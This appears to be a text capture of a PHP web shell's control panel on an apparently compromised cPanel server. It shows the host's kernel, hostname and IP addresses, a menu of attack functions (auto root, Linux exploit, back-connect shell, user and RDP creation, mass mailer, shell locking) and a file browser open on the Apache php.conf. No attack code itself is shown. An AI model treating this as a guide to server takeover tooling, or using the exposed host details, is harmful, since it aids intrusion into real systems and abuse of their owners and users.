Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.70.127.170
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
apache2 /
conf.d /
[ HOME SHELL ]
Name
Size
Permission
Action
includes
[ DIR ]
drwxr-xr-x
modsec
[ DIR ]
drwxr-xr-x
ssl.crt
[ DIR ]
drwxr-xr-x
ssl.key
[ DIR ]
drwxr-xr-x
userdata
[ DIR ]
drwxr-xr-x
00-suphp.conf
142
B
-rwxr-xr-x
README
366
B
-rw-r--r--
autoindex.conf
3.2
KB
-rw-r--r--
cgid.conf
75
B
-rw-r--r--
cperror.conf
502
B
-rw-r--r--
http2.conf
90
B
-rw-r--r--
modsec2.conf
1.58
KB
-rwxr-xr-x
php.conf
1.14
KB
-rw-r--r--
php_add_handler_fix.conf
236
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : php.conf
# This file was automatically generated by the Cpanel php # Configuration system. If you wish to change the way php is being # handled by Apache on your system, use the # /usr/local/cpanel/bin/rebuild_phpconf script or the WHM interface. # # Manual edits of this file will be lost when the configuration is # rebuilt. # These initial handlers serve as fallback in case there is any # time between when configuration has changed and when it takes effect. # We use CGI style since it is simple and the default we use elsewhere. # If the version is not set to CGI they will get a 404 until the new # configuration takes effect which is better than serving source # code until the new configuration takes effect. <IfModule actions_module> Action application/x-httpd-ea-php82 /cgi-sys/ea-php82 </IfModule> # Set ea-php82 as the system default for php <IfModule mime_module> AddHandler application/x-httpd-ea-php82 .php .php8 .phtml </IfModule> # suPHP configuration for ea-php82 <IfModule suphp_module> suPHP_Engine on <Directory /> suPHP_AddHandler application/x-httpd-ea-php82 </Directory> </IfModule> # End of autogenerated php configuration.
Close